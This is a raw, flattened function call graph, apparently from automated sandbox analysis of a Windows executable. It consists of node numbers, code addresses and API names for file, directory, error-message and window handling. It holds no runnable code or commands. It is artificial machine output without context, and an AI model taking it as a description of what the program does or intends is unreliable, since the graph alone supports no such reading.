??2@YAPAXI 8536->8537 8538 4011be 8536->8538 8537->8538 8539 4011a1 ??3@YAXPAX 8537->8539 8538->8518 8538->8519 8539->8538 8542 402788 8541->8542 8543 401172 2 API calls 8542->8543 8544 402793 8543->8544 8544->8524 8552 402b71 8545->8552 8549 404210 8588 4041c4 8549->8588 8553 401458 2 API calls 8552->8553 8554 402b7f 8553->8554 8555 402b8f ExpandEnvironmentStringsW 8554->8555 8556 401172 2 API calls 8554->8556 8557 402bb3 8555->8557 8558 402ba8 ??3@YAXPAX 8555->8558 8556->8555 8599 4027aa 8557->8599 8559 402bea 8558->8559 8565 403ebc 8559->8565 8562 402bce 8603 4013a9 8562->8603 8564 402be2 ??3@YAXPAX 8564->8559 8566 401458 2 API calls 8565->8566 8567 403eca 8566->8567 8568 4013a9 2 API calls 8567->8568 8569 403ed5 8568->8569 8607 4027c2 8569->8607 8571 403ee2 8572 402771 2 API calls 8571->8572 8573 403eef 8572->8573 8611 403e41 8573->8611 8576 4013a9 2 API calls 8577 403f13 8576->8577 8578 4027c2 2 API calls 8577->8578 8579 403f20 8578->8579 8580 402771 2 API calls 8579->8580 8581 403f2d 8580->8581 8582 403e41 3 API calls 8581->8582 8583 403f3d ??3@YAXPAX 8582->8583 8584 402771 2 API calls 8583->8584 8585 403f54 8584->8585 8586 403e41 3 API calls 8585->8586 8587 403f63 ??3@YAXPAX ??3@YAXPAX 8586->8587 8587->8549 8589 402b71 6 API calls 8588->8589 8590 4041cf 8589->8590 8636 403f77 8590->8636 8592 4041dc 8659 404032 8592->8659 8594 4041e7 8682 4040ed 8594->8682 8596 4041ed 8597 402b71 6 API calls 8596->8597 8598 4041f3 8597->8598 8598->8529 8600 4027b6 8599->8600 8601 4027bc ExpandEnvironmentStringsW 8599->8601 8602 401172 2 API calls 8600->8602 8601->8562 8602->8601 8604 4013b5 8603->8604 8606 4013c7 8603->8606 8605 401172 2 API calls 8604->8605 8605->8606 8606->8564 8608 4027cf 8607->8608 8616 4013df 8608->8616 8610 4027da 8610->8571 8612 403e53 ??3@YAXPAX 8611->8612 8615 403e57 8611->8615 8612->8576 8615->8612 8620 4029d8 8615->8620 8624 403303 8615->8624 8617 401423 8616->8617 8618 4013f3 8616->8618 8617->8610 8619 401172 2 API calls 8618->8619 8619->8617 8621 4029ee 8620->8621 8623 402a02 8621->8623 8628 4025a5 memmove 8621->8628 8623->8615 8625 403312 8624->8625 8627 40332b 8625->8627 8629 402a90 8625->8629 8627->8615 8628->8623 8630 402aa0 8629->8630 8631 4013df 2 API calls 8630->8631 8632 402aac 8631->8632 8635 4025a5 memmove 8632->8635 8634 402ab9 8634->8627 8635->8634 8637 401458 2 API calls 8636->8637 8638 403f85 8637->8638 8639 4013a9 2 API calls 8638->8639 8640 403f90 8639->8640 8641 4027c2 2 API calls 8640->8641 8642 403f9d 8641->8642 8643 402771 2 API calls 8642->8643 8644 403faa 8643->8644 8645 403e41 3 API calls 8644->8645 8646 403fba ??3@YAXPAX 8645->8646 8647 4013a9 2 API calls 8646->8647 8648 403fce 8647->8648 8649 4027c2 2 API calls 8648->8649 8650 403fdb 8649->8650 8651 402771 2 API calls 8650->8651 8652 403fe8 8651->8652 8653 403e41 3 API calls 8652->8653 8654 403ff8 ??3@YAXPAX 8653->8654 8655 402771 2 API calls 8654->8655 8656 40400f 8655->8656 8657 403e41 3 API calls 8656->8657 8658 40401e ??3@YAXPAX ??3@YAXPAX 8657->8658 8658->8592 8660 401458 2 API calls 8659->8660 8661 404040 8660->8661 8662 4013a9 2 API calls 8661->8662 8663 40404b 8662->8663 8664 4027c2 2 API calls 8663->8664 8665 404058 8664->8665 8666 402771 2 API calls 8665->8666 8667 404065 8666->8667 8668 403e41 3 API calls 8667->8668 8669 404075 ??3@YAXPAX 8668->8669 8670 4013a9 2 API calls 8669->8670 8671 404089 8670->8671 8672 4027c2 2 API calls 8671->8672 8673 404096 8672->8673 8674 402771 2 API calls 8673->8674 8675 4040a3 8674->8675 8676 403e41 3 API calls 8675->8676 8677 4040b3 ??3@YAXPAX 8676->8677 8678 402771 2 API calls 8677->8678 8679 4040ca 8678->8679 8680 403e41 3 API calls 8679->8680 8681 4040d9 ??3@YAXPAX ??3@YAXPAX 8680->8681 8681->8594 8683 402771 2 API calls 8682->8683 8684 404100 8683->8684 8685 403e41 3 API calls 8684->8685 8686 404111 ??3@YAXPAX 8685->8686 8686->8596 8701 409f00 8702 40275c 48 API calls 8701->8702 8703 409f0a 8702->8703 8687 40ba20 8689 40ba3d 8687->8689 8688 40ba4c 8689->8688 8692 409f60 8689->8692 8693 409f6a 8692->8693 8697 409f8a 8693->8697 8698 401d13 8693->8698 8696 40275c 48 API calls 8696->8697 8699 401d20 8698->8699 8700 401d1a free 8698->8700 8699->8696 8700->8699 8705 40f227 _EH_prolog 8713 40f25a 8705->8713 8706 40f27c 8707 40f387 8740 4011d1 8707->8740 8709 40f3b1 8714 40f3be ??2@YAPAXI 8709->8714 8710 40f39c 8793 40ef85 8710->8793 8711 40f040 _CxxThrowException ??2@YAPAXI memcpy ??3@YAXPAX 8711->8713 8713->8706 8713->8707 8713->8711 8715 40f1fd 8 API calls 8713->8715 8717 40ce5c VirtualFree free ??3@YAXPAX ??3@YAXPAX ctype 8713->8717 8786 40f117 8713->8786 8790 40ef63 8713->8790 8733 40f3d8 8714->8733 8715->8713 8717->8713 8719 40f422 8796 40f090 8719->8796 8720 40f485 ??2@YAPAXI 8720->8733 8722 40f090 3 API calls 8722->8733 8726 40ef85 ctype 3 API calls 8726->8733 8728 40f502 8729 40f090 3 API calls 8728->8729 8730 40f527 8729->8730 8731 40ef85 ctype 3 API calls 8730->8731 8731->8706 8733->8706 8733->8719 8733->8720 8733->8722 8733->8726 8733->8728 8734 40f5c5 8733->8734 8750 40faff 8733->8750 8754 40e9ef 8733->8754 8799 40f776 ??2@YAPAXI 8733->8799 8801 40faac 8733->8801 8736 40f090 3 API calls 8734->8736 8737 40f5e4 8736->8737 8738 40ef85 ctype 3 API calls 8737->8738 8738->8706 8741 401235 SendMessageW 8740->8741 8742 4011df GetDiskFreeSpaceExW 8740->8742 8748 40121d 8741->8748 8742->8741 8743 4011f7 8742->8743 8743->8741 8744 402187 19 API calls 8743->8744 8745 401210 8744->8745 8746 408d52 27 API calls 8745->8746 8747 401216 8746->8747 8747->8748 8749 40122e 8747->8749 8748->8709 8748->8710 8749->8741 8751 40fb28 8750->8751 8805 40f962 8751->8805 9082 410a40 8754->9082 8757 40ea0c 8757->8733 8759 40eb20 9100 40e6d7 8759->9100 8760 40ea58 ??2@YAPAXI 8769 40ea40 8760->8769 8762 40ea7c ??2@YAPAXI 8762->8769 8769->8759 8769->8760 8769->8762 9155 40e45f ??2@YAPAXI 8769->9155 8787 40f126 8786->8787 8789 40f12c 8786->8789 8787->8713 8788 40f142 _CxxThrowException 8788->8787 8789->8787 8789->8788 8791 40cde2 4 API calls 8790->8791 8792 40ef6b 8791->8792 8792->8713 8794 40cdda ctype 3 API calls 8793->8794 8795 40ef93 8794->8795 8797 40e4dd ctype 3 API calls 8796->8797 8798 40f09b 8797->8798 8800 40f7a8 8799->8800 8800->8733 8803 40fab1 8801->8803 8802 40fad8 8802->8733 8803->8802 8804 40f841 112 API calls 8803->8804 8804->8803 8806 40f967 8805->8806 8807 40f99d 8806->8807 8809 40f841 8806->8809 8807->8733 8810 40f85b 8809->8810 8814 401815 8810->8814 8877 40ca28 8810->8877 8811 40f88f 8811->8806 8815 401831 8814->8815 8821 401827 8814->8821 8880 41017a _EH_prolog 8815->8880 8817 40185e 8924 40cb68 8817->8924 8818 401458 2 API calls 8819 401877 8818->8819 8822 401b51 ??3@YAXPAX 8819->8822 8823 40188c 8819->8823 8821->8811 8827 40cb68 VariantClear 8822->8827 8906 401370 8823->8906 8826 401897 8910 401551 8826->8910 8827->8821 8830 4013a9 2 API calls 8831 4018b6 ??3@YAXPAX 8830->8831 8836 4018c8 8831->8836 8856 401b17 ??3@YAXPAX 8831->8856 8833 40cb68 VariantClear 8833->8821 8834 4018e9 8835 40cb68 VariantClear 8834->8835 8837 4018f1 ??3@YAXPAX 8835->8837 8836->8834 8838 401953 8836->8838 8839 401914 8836->8839 8837->8817 8841 401991 8838->8841 8842 401978 8838->8842 8840 40cb68 VariantClear 8839->8840 8843 401926 ??3@YAXPAX 8840->8843 8845 4019b3 GetLocalTime SystemTimeToFileTime 8841->8845 8846 401999 8841->8846 8844 40cb68 VariantClear 8842->8844 8843->8817 8847 401980 ??3@YAXPAX 8844->8847 8845->8846 8846->8839 8848 4019d0 8846->8848 8849 4019e7 8846->8849 8847->8817 8928 4036f1 lstrlenW 8848->8928 8915 403387 GetFileAttributesW 8849->8915 8853 401b23 GetLastError 8853->8856 8854 401a07 ??2@YAPAXI 8857 401a13 8854->8857 8855 401b19 8855->8853 8856->8833 8952 40ca5c 8857->8952 8860 401afe 8863 40cb68 VariantClear 8860->8863 8861 401a4e GetLastError 8955 40133e 8861->8955 8863->8856 8864 401a60 8865 4036f1 88 API calls 8864->8865 8869 401a6e ??3@YAXPAX 8864->8869 8867 401abb 8865->8867 8867->8869 8870 40ca5c 2 API calls 8867->8870 8868 401a8b 8871 40cb68 VariantClear 8868->8871 8869->8868 8872 401ae0 8870->8872 8873 401a99 ??3@YAXPAX 8871->8873 8874 401ae4 GetLastError 8872->8874 8875 401af5 ??3@YAXPAX 8872->8875 8873->8817 8874->8869 8875->8860 9074 40c95f 8877->9074 8881 410283 8880->8881 8882 4101b5 8880->8882 8883 4101d2 8881->8883 8884 410288 8881->8884 8882->8883 8885 4101c4 8882->8885 8886 41024f 8882->8886 8893 4101f8 8883->8893 8984 40fefb 8883->8984 8889 410292 8884->8889 8892 4101e4 8884->8892 8894 41023d 8884->8894 8887 4101c9 8885->8887 8885->8894 8886->8893 8958 4132af 8886->8958 8898 4101cf 8887->8898 8904 4101fd 8887->8904 8889->8894 8889->8904 8892->8893 8972 40cc18 8892->8972 8967 40cb6d 8893->8967 8980 40cbf3 8894->8980 8897 410265 8961 40cbac 8897->8961 8898->8883 8898->8892 8899 40cb68 VariantClear 8903 40185a 8899->8903 8903->8817 8903->8818 8904->8893 8976 40cc38 8904->8976 8907 401387 8906->8907 8908 401172 2 API calls 8907->8908 8909 401392 8908->8909 8909->8826 8911 40133e 2 API calls 8910->8911 8912 40155f 8911->8912 8999 401429 8912->8999 8914 40156a 8914->8830 8916 4033a4 8915->8916 8920 4019f3 8915->8920 8917 4033a8 SetLastError 8916->8917 8918 4033b5 8916->8918 8917->8920 8919 4033be 8918->8919 8918->8920 8921 4033cc FindFirstFileW 8918->8921 9002 40335a 8919->9002 8920->8853 8920->8854 8920->8855 8921->8919 8923 4033df FindClose CompareFileTime 8921->8923 8923->8919 8923->8920 8927 40cb24 8924->8927 8925 40cb45 VariantClear 8925->8821 8926 40cb5c 8926->8821 8927->8925 8927->8926 8929 402771 2 API calls 8928->8929 8930 403712 8929->8930 8931 401172 2 API calls 8930->8931 8932 403722 8930->8932 8931->8932 8934 403770 GetSystemTimeAsFileTime GetFileAttributesW 8932->8934 8937 403814 8932->8937 9043 401b75 CreateDirectoryW 8932->9043 8935 403785 8934->8935 8936 40378f 8934->8936 8938 403387 22 API calls 8935->8938 8939 401b75 4 API calls 8936->8939 8942 403795 ??3@YAXPAX 8936->8942 8940 403844 8937->8940 8937->8942 8938->8936 8950 4037a2 8939->8950 8941 408dbf 57 API calls 8940->8941 8947 40384e ??3@YAXPAX 8941->8947 8949 403859 8942->8949 8943 4037a7 9049 408dbf 8943->9049 8945 403808 ??3@YAXPAX 8945->8949 8946 4037ba memcpy 8946->8950 8947->8949 8949->8839 8950->8943 8950->8945 8950->8946 8951 401b75 4 API calls 8950->8951 8951->8950 9071 40ca45 8952->9071 8956 401172 2 API calls 8955->8956 8957 401358 8956->8957 8957->8864 8959 40133e 2 API calls 8958->8959 8960 4132bc 8959->8960 8960->8897 8988 40cb96 8961->8988 8964 40cbd1 8965 40cbec ??3@YAXPAX 8964->8965 8966 40cbd6 _CxxThrowException 8964->8966 8965->8893 8966->8965 8968 40cb24 VariantClear 8967->8968 8969 40cb79 8968->8969 8970 40cb92 8969->8970 8971 40cb7d memcpy 8969->8971 8970->8899 8971->8970 8973 40cc21 8972->8973 8974 40cc26 8972->8974 8975 40cb96 VariantClear 8973->8975 8974->8893 8975->8974 8977 40cc41 8976->8977 8978 40cc46 8976->8978 8979 40cb96 VariantClear 8977->8979 8978->8893 8979->8978 8981 40cc01 8980->8981 8982 40cbfc 8980->8982 8981->8893 8983 40cb96 VariantClear 8982->8983 8983->8981 8985 40ff0d 8984->8985 8986 40ff29 8985->8986 8995 40cc5f 8985->8995 8986->8893 8991 40cb24 8988->8991 8990 40cb9e SysAllocString 8990->8964 8990->8965 8994 40cb2c 8991->8994 8992 40cb45 VariantClear 8992->8990 8993 40cb5c 8993->8990 8994->8992 8994->8993 8996 40cc68 8995->8996 8998 40cc6d 8995->8998 8997 40cb96 VariantClear 8996->8997 8997->8998 8998->8986 9000 4013df 2 API calls 8999->9000 9001 401439 9000->9001 9001->8914 9008 402ff3 9002->9008 9004 403363 9005 403384 9004->9005 9006 403368 GetLastError 9004->9006 9005->8920 9007 403373 9006->9007 9007->8920 9009 403000 GetFileAttributesW 9008->9009 9010 402ffc 9008->9010 9011 403011 9009->9011 9012 403016 9009->9012 9010->9004 9011->9004 9013 403034 9012->9013 9014 40301a SetFileAttributesW 9012->9014 9019 402ee6 9013->9019 9015 403030 9014->9015 9016 403027 DeleteFileW 9014->9016 9015->9004 9016->9004 9020 402771 2 API calls 9019->9020 9021 402efd 9020->9021 9022 4027c2 2 API calls 9021->9022 9023 402f0a FindFirstFileW 9022->9023 9024 402fc2 SetFileAttributesW 9023->9024 9038 402f2c 9023->9038 9026 402fe5 ??3@YAXPAX 9024->9026 9027 402fcd RemoveDirectoryW 9024->9027 9025 401370 2 API calls 9025->9038 9029 402fed 9026->9029 9027->9026 9028 402fda ??3@YAXPAX 9027->9028 9028->9029 9029->9004 9031 4027c2 2 API calls 9031->9038 9032 402f91 SetFileAttributesW 9032->9026 9036 402f9a DeleteFileW 9032->9036 9033 402f5c lstrcmpW 9034 402f72 lstrcmpW 9033->9034 9035 402fa5 FindNextFileW 9033->9035 9034->9035 9034->9038 9037 402fbb FindClose 9035->9037 9035->9038 9036->9038 9037->9024 9038->9025 9038->9026 9038->9031 9038->9032 9038->9033 9038->9035 9039 402ee6 2 API calls 9038->9039 9040 401526 9038->9040 9039->9038 9041 4013df 2 API calls 9040->9041 9042 401530 9041->9042 9042->9038 9044 401bb6 9043->9044 9045 401b86 GetLastError 9043->9045 9044->8932 9046 401ba0 GetFileAttributesW 9045->9046 9048 401b95 9045->9048 9046->9044 9046->9048 9047 401b96 SetLastError 9047->8932 9048->9044 9048->9047 9050 402187 19 API calls 9049->9050 9051 408dd3 wvsprintfW 9050->9051 9052 408ea2 9051->9052 9053 408df4 GetLastError FormatMessageW 9051->9053 9056 408cdb 27 API calls 9052->9056 9054 408e22 FormatMessageW 9053->9054 9055 408e37 lstrlenW lstrlenW ??2@YAPAXI lstrcpyW lstrcpyW 9053->9055 9054->9052 9054->9055 9060 408cdb 9055->9060 9058 408eae 9056->9058 9058->8942 9061 408d50 ??3@YAXPAX LocalFree 9060->9061 9062 408cea 9060->9062 9061->9058 9063 407c87 4 API calls 9062->9063 9064 408cf9 IsWindow 9063->9064 9065 408d10 IsBadReadPtr 9064->9065 9068 408d22 9064->9068 9065->9068 9066 407ce8 22 API calls 9067 408d48 9066->9067 9070 407a5b ??3@YAXPAX 9067->9070 9068->9066 9070->9061 9072 40ca28 2 API calls 9071->9072 9073 401a46 9072->9073 9073->8860 9073->8861 9079 40c88e 9074->9079 9077 40c993 9077->8811 9078 40c96e CreateFileW 9078->9077 9080 40c898 CloseHandle 9079->9080 9081 40c8a3 9079->9081 9080->9081 9081->9077 9081->9078 9083 410a59 9082->9083 9098 40ea08 9082->9098 9083->9098 9185 410817 9083->9185 9085 410c33 9086 40ce5c ctype 4 API calls 9085->9086 9086->9098 9088 410817 7 API calls 9089 410af5 9088->9089 9089->9085 9090 410b25 9089->9090 9192 40ce5c 9090->9192 9092 410b2e 9093 410bab 9092->9093 9095 4107a2 _CxxThrowException ??2@YAPAXI memcpy ??3@YAXPAX 9092->9095 9093->9093 9094 40ce5c ctype 4 API calls 9093->9094 9096 410be7 9094->9096 9095->9092 9097 40ce5c ctype 4 API calls 9096->9097 9097->9098 9098->8757 9099 406eb0 InitializeCriticalSection 9098->9099 9099->8769 9226 40e214 9100->9226 9156 40e46e 9155->9156 9157 4107a2 4 API calls 9156->9157 9158 40e485 9157->9158 9158->8769 9186 40cdda ctype 3 API calls 9185->9186 9187 410823 9186->9187 9196 40cd11 9187->9196 9189 41082d 9190 41083f 9189->9190 9191 40ef63 4 API calls 9189->9191 9190->9085 9190->9088 9191->9189 9193 40ce3b 9192->9193 9204 40ccfd 9193->9204 9197 40cda5 9196->9197 9199 40cd24 9196->9199 9197->9189 9198 40cd33 _CxxThrowException 9198->9199 9199->9198 9200 40cd63 ??2@YAPAXI 9199->9200 9201 40cd95 ??3@YAXPAX 9199->9201 9200->9199 9202 40cd79 memcpy 9200->9202 9201->9197 9202->9201 9210 409f10 9204->9210 9213 401cfa 9204->9213 9216 40c7e0 9204->9216 9222 40b880 9204->9222 9205 40cd0e ??3@YAXPAX 9205->9092 9211 401d13 free 9210->9211 9212 409f1a 9211->9212 9212->9205 9214 401d01 VirtualFree 9213->9214 9215 401d12 9213->9215 9214->9215 9215->9205 9217 40c805 9216->9217 9218 401d13 free 9217->9218 9219 40c80e 9218->9219 9220 40c830 9219->9220 9221 40c827 ??3@YAXPAX 9219->9221 9220->9205 9221->9220 9223 40b8a6 9222->9223 9224 401d13 free 9223->9224 9225 40b8cc 9224->9225 9225->9205 9227 40cdda ctype 3 API calls 9226->9227 9228 40e21c 9227->9228 9229 40cdda ctype 3 API calls 9228->9229 9230 40e224 9229->9230 9231 40cdda ctype 3 API calls 9230->9231 9232 40e22c 9231->9232 9497 41382f __set_app_type __p__fmode __p__commode 9498 41389e 9497->9498 9499 4138b2 9498->9499 9500 4138a6 __setusermatherr 9498->9500 9509 4139a6 _controlfp 9499->9509 9500->9499 9502 4138b7 _initterm __getmainargs _initterm 9503 41390b GetStartupInfoA 9502->9503 9505 41393f GetModuleHandleA 9503->9505 9510 406d72 _EH_prolog 9505->9510 9509->9502 9513 405721 ?_set_new_handler@@YAP6AHI@ZP6AHI@Z 9510->9513 9868 401d21 GetModuleHandleW CreateWindowExW 9513->9868 9516 406d51 MessageBoxA 9518 406d68 exit _XcptFilter 9516->9518 9517 40575f 9517->9516 9519 405779 9517->9519 9520 401458 2 API calls 9519->9520 9521 4057b0 9520->9521 9522 401458 2 API calls 9521->9522 9523 4057bb 9522->9523 9871 4044c6 9523->9871 9528 4027c2 2 API calls 9529 4057f9 9528->9529 9880 402dd6 9529->9880 9531 405802 9894 4043f8 9531->9894 9535 405821 _wtol 9537 405837 9535->9537 9899 404903 #17 9537->9899 9538 4043f8 3 API calls 9539 405867 9538->9539 9540 4058a1 9539->9540 9541 40586d 9539->9541 9543 4043f8 3 API calls 9540->9543 10129 404e99 9541->10129 9544 4058ac 9543->9544 9546 4058b2 9544->9546 9547 4058bd 9544->9547 9545 405874 ??3@YAXPAX 10146 404513 9545->10146 10151 4052a7 9546->10151 9549 4043f8 3 API calls 9547->9549 9553 4058cc 9549->9553 9551 405885 ??3@YAXPAX ??3@YAXPAX 9551->9518 9552 405901 GetModuleFileNameW 9555 405913 9552->9555 9556 405925 9552->9556 9553->9552 9554 401172 2 API calls 9553->9554 9554->9552 9557 408dbf 57 API calls 9555->9557 9558 4043f8 3 API calls 9556->9558 9563 405872 9557->9563 9570 405947 9558->9570 9559 405ae3 9560 4013a9 2 API calls 9559->9560 9561 405af3 9560->9561 9562 4013a9 2 API calls 9561->9562 9567 405b00 9562->9567 9563->9545 9564 405a05 9564->9563 9565 405a38 9564->9565 9569 405a21 _wtol 9564->9569 9566 4043f8 3 API calls 9565->9566 9578 405a97 9566->9578 9568 405b85 9567->9568 9572 401370 2 API calls 9567->9572 9925 4023a0 9568->9925 9569->9565 9570->9559 9570->9563 9570->9564 9570->9565 9577 401526 2 API calls 9570->9577 9574 405b35 9572->9574 9576 401370 2 API calls 9574->9576 9575 401370 2 API calls 9579 405bab ??2@YAPAXI 9575->9579 9583 405b4b 9576->9583 9577->9570 9578->9559 9580 404a97 2 API calls 9578->9580 9581 405bb7 9579->9581 9582 405ac8 9580->9582 9928 40c9d7 9581->9928 9582->9559 9584 4013a9 2 API calls 9582->9584 9585 4013a9 2 API calls 9583->9585 9584->9559 9586 405b75 9585->9586 9588 402187 19 API calls 9586->9588 9590 405b7c 9588->9590 9593 4027c2 2 API calls 9590->9593 9591 405be4 9594 408dbf 57 API calls 9591->9594 9592 405c0a 9931 402823 9592->9931 9593->9568 9594->9563 9598 405c1f 9599 405c25 9598->9599 9600 405c49 9598->9600 9602 408dbf 57 API calls 9599->9602 9601 405cdb 9600->9601 9604 4043f8 3 API calls 9600->9604 9605 40cdda ctype 3 API calls 9601->9605 9603 405c2d ??3@YAXPAX 9602->9603 9603->9563 9606 405c60 9604->9606 9607 405ce3 9605->9607 9606->9601 9616 405c66 9606->9616 9608 405d08 9607->9608 9965 403400 9607->9965 9610 405d11 9608->9610 9611 405cbf ??3@YAXPAX 9608->9611 9614 405d82 9610->9614 9615 405d1d wsprintfW 9610->9615 9621 401458 2 API calls 9610->9621 9624 401370 ??2@YAPAXI ??3@YAXPAX 9610->9624 9626 402187 19 API calls 9610->9626 10185 4032d9 ??2@YAPAXI 9610->10185 10191 40269a ??3@YAXPAX ??3@YAXPAX 9610->10191 9611->9563 9613 405cfd ??3@YAXPAX 9613->9563 9994 404b06 9614->9994 9618 401458 2 API calls 9615->9618 9616->9611 10159 4054c1 9616->10159 9618->9610 9620 405c95 9620->9611 9622 405c9b 9620->9622 9621->9610 9623 408dbf 57 API calls 9622->9623 9625 405ca3 ??3@YAXPAX 9623->9625 9624->9610 9625->9563 9626->9610 9627 406006 9628 404b06 26 API calls 9627->9628 9629 406015 9628->9629 9631 40619d 9629->9631 10217 40244e AllocateAndInitializeSid 9629->10217 10053 4026b0 9631->10053 9636 40624e 10056 4045f4 9636->10056 9638 40603a 9641 401458 2 API calls 9638->9641 9639 402771 2 API calls 9682 4061b5 9639->9682 9643 406042 9641->9643 9646 401458 2 API calls 9643->9646 9644 4062e1 CoInitialize 9652 4026b0 lstrcmpW 9644->9652 9645 406275 9648 4026b0 lstrcmpW 9645->9648 9649 40604a GetCommandLineW 9646->9649 9651 406284 9648->9651 9653 404a97 2 API calls 9649->9653 9650 406250 ??3@YAXPAX 9650->9636 9654 406294 9651->9654 9658 402187 19 API calls 9651->9658 9655 406307 9652->9655 9656 40605a 9653->9656 10226 4041ab 9654->10226 9659 40631b 9655->9659 9662 401370 2 API calls 9655->9662 9660 402771 2 API calls 9656->9660 9657 401458 ??2@YAPAXI ??3@YAXPAX 9657->9682 9658->9654 9664 4041c4 16 API calls 9659->9664 9663 406065 9660->9663 9662->9659 9668 4048a9 2 API calls 9663->9668 9669 406321 9664->9669 9666 4013a9 2 API calls 9666->9682 9667 40421b lstrlenW lstrlenW _wcsnicmp 9675 405d8b 9667->9675 9671 406083 9668->9671 9672 4026b0 lstrcmpW 9669->9672 9670 407ce8 22 API calls 9673 4062b7 9670->9673 9676 4048c7 2 API calls 9671->9676 9677 406330 9672->9677 10229 407a5b ??3@YAXPAX 9673->10229 9674 401370 2 API calls 9674->9682 9675->9627 9675->9667 9699 405f6a _wtol 9675->9699 9726 40614a ??3@YAXPAX 9675->9726 10192 404d50 9675->10192 10203 40464b 9675->10203 9683 406090 9676->9683 9679 406344 9677->9679 9680 406337 _wtol 9677->9680 9684 40636a 9679->9684 10230 408f81 9679->10230 9680->9679 9681 4062c2 ??3@YAXPAX 9681->9563 9682->9636 9682->9639 9682->9650 9682->9657 9682->9666 9682->9674 9685 4032d9 7 API calls 9682->9685 10225 40269a ??3@YAXPAX ??3@YAXPAX 9682->10225 9686 4048c7 2 API calls 9683->9686 9689 40637e 9684->9689 9691 406355 ??3@YAXPAX 9684->9691 10246 408eb4 9684->10246 9685->9682 9687 40609d 9686->9687 10220 4048e5 9687->10220 9701 401458 2 API calls 9689->9701 9705 406503 ??3@YAXPAX 9689->9705 9706 4063bc GetKeyState 9689->9706 9710 406563 9689->9710 9711 401370 ??2@YAPAXI ??3@YAXPAX 9689->9711 9712 4026b0 lstrcmpW 9689->9712 9718 401526 ??2@YAPAXI ??3@YAXPAX 9689->9718 9727 406520 9689->9727 9729 406553 ??3@YAXPAX ??3@YAXPAX 9689->9729 9730 4064f8 ??3@YAXPAX 9689->9730 10273 408461 9689->10273 10286 4084df 9689->10286 9691->9684 9695 40622b ??3@YAXPAX 9697 4026b0 lstrcmpW 9695->9697 9696 401551 2 API calls 9698 4060b7 9696->9698 9697->9682 9700 4013a9 2 API calls 9698->9700 9699->9675 9703 4060c3 7 API calls 9700->9703 9701->9689 9704 404f67 9 API calls 9703->9704 9707 40610c 9704->9707 9705->9563 9706->9689 9708 406116 ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX 9707->9708 9709 406167 ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX 9707->9709 9708->9563 9709->9545 9709->9563 9713 406599 9710->9713 9714 40656b 9710->9714 9711->9689 9712->9689 9716 40133e 2 API calls 9713->9716 10062 404545 9714->10062 9719 4065a7 9716->9719 9718->9689 9723 4041c4 16 API calls 9719->9723 9722 4013a9 2 API calls 9724 406588 ??3@YAXPAX 9722->9724 9725 4065b0 9723->9725 9734 4065d0 9724->9734 9728 4065c1 ??3@YAXPAX 9725->9728 9732 4013a9 2 API calls 9725->9732 9726->9563 9731 408dbf 57 API calls 9727->9731 9728->9734 9729->9563 9730->9689 9733 40652c ??3@YAXPAX ??3@YAXPAX 9731->9733 9732->9728 9733->9563 9735 40661a 9734->9735 9736 40660d 9734->9736 10294 40851f 9735->10294 10075 40172c ??2@YAPAXI 9736->10075 9739 406616 9740 406657 9739->9740 9741 40662c 9739->9741 9742 4045f4 22 API calls 9740->9742 10302 4044b0 9741->10302 9743 40665c 9742->9743 9746 406c4d 9743->9746 9747 401458 2 API calls 9743->9747 9749 406cc5 9746->9749 9750 4026b0 lstrcmpW 9746->9750 9748 40667a 9747->9748 9793 40668d 9748->9793 10306 404a41 9748->10306 9752 406d08 ??3@YAXPAX ??3@YAXPAX 9749->9752 9758 4026b0 lstrcmpW 9749->9758 9756 406c7e 9750->9756 9753 406d21 9752->9753 9754 406d27 ??3@YAXPAX 9752->9754 9753->9754 9757 404513 4 API calls 9754->9757 9755 401458 ??2@YAPAXI ??3@YAXPAX 9755->9793 9756->9749 10373 404497 9756->10373 9759 406d38 ??3@YAXPAX ??3@YAXPAX 9757->9759 9760 406ce4 9758->9760 9759->9518 9760->9752 9763 406cf1 9760->9763 9767 40133e 2 API calls 9763->9767 9764 4066bc 9768 406ae3 ??3@YAXPAX ??3@YAXPAX 9764->9768 9769 4066c9 9764->9769 9765 4026b0 lstrcmpW 9765->9793 9766 407ce8 22 API calls 9771 406cba 9766->9771 9773 406d00 9767->9773 9772 406bec 9768->9772 9770 4048c7 2 API calls 9769->9770 9774 4066e5 9770->9774 10376 407a5b ??3@YAXPAX 9771->10376 9777 406c44 ??3@YAXPAX 9772->9777 9782 4045f4 22 API calls 9772->9782 10377 405304 9773->10377 9780 4048c7 2 API calls 9774->9780 9775 406729 9781 401370 2 API calls 9775->9781 9777->9746 9784 4066f2 9780->9784 9785 406732 9781->9785 9783 406bfb 9782->9783 10363 404dae 9783->10363 9787 4013a9 2 API calls 9784->9787 9789 4041f8 20 API calls 9785->9789 9792 4066fe ??3@YAXPAX ??3@YAXPAX GetFileAttributesW 9787->9792 9788 406b49 ??3@YAXPAX ??3@YAXPAX 9788->9772 9806 40673b 9789->9806 9790 401370 2 API calls 9790->9793 9791 406c14 SetCurrentDirectoryW 9794 404dae 4 API calls 9791->9794 9795 406725 9792->9795 9796 406afa 9792->9796 9793->9755 9793->9764 9793->9765 9793->9775 9793->9788 9793->9790 9797 401526 2 API calls 9793->9797 9798 406c3c 9794->9798 9795->9775 9799 4044b0 16 API calls 9796->9799 9800 4067c9 ??3@YAXPAX ??3@YAXPAX 9797->9800 9801 4044b0 16 API calls 9798->9801 9802 406aff 9799->9802 9800->9793 9801->9777 9803 408dbf 57 API calls 9802->9803 9804 406b08 ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX 9803->9804 9804->9563 9805 406b3e 9804->9805 9805->9563 9807 406868 _wtol 9806->9807 9808 404255 lstrlenW lstrlenW _wcsnicmp 9806->9808 9809 40692c 9806->9809 9807->9806 9808->9806 9810 406935 9809->9810 9811 406987 9809->9811 9812 40695a 9810->9812 9813 40693b 9810->9813 9814 4013a9 2 API calls 9811->9814 9815 401370 2 API calls 9812->9815 9816 401370 2 API calls 9813->9816 9817 406985 9814->9817 9819 406958 9815->9819 9818 406946 9816->9818 9820 4027c2 2 API calls 9817->9820 9822 4027c2 2 API calls 9818->9822 9821 4026b0 lstrcmpW 9819->9821 9823 406999 9820->9823 9825 40696f 9821->9825 9824 40694f 9822->9824 9826 401458 2 API calls 9823->9826 9827 4027c2 2 API calls 9824->9827 9825->9823 9830 4027c2 2 API calls 9825->9830 9828 4069a1 9826->9828 9827->9819 9829 404a97 2 API calls 9828->9829 9831 4069ae 9829->9831 9830->9817 9832 402771 2 API calls 9831->9832 9833 4069b9 